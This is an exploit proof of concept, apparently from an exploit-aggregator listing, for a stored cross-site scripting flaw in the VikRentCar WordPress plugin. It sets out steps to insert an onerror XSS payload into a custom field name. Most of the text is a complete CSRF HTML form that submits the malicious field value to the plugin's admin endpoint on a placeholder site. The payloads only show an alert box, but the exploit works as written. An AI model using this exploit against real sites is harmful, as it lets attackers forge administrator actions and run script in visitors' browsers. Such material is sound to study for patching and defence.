## https://sploitus.com/exploit?id=WPEX-ID:E3F6576F-08CB-4278-8C79-3EF4D0B85CD9
Steps To produce the bug:
1. Go to the custom fields option in the plugin (/wp-admin/admin.php?option=com_vikrentcar&task=customf)
2. Edit the field and add an XSS payload in the Field Name, ie <img src=x onerror=alert(1337)>
3. Now save that and whenever anyone visit that XSS will trigger
via CSRF
<html>
<body>
<form action="https://example.com/wp-admin/admin.php" method="POST">
<input type="hidden" name="name" value="ORDER_TERMSCONDITIONS<img src onerror=alert(/XSS/)>" />
<input type="hidden" name="type" value="checkbox" />
<input type="hidden" name="choose[]" value="" />
<input type="hidden" name="required" value="1" />
<input type="hidden" name="flag" value="" />
<input type="hidden" name="poplink" value="" />
<input type="hidden" name="task" value="updatecustomf" />
<input type="hidden" name="option" value="com_vikrentcar" />
<input type="hidden" name="where" value="13" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>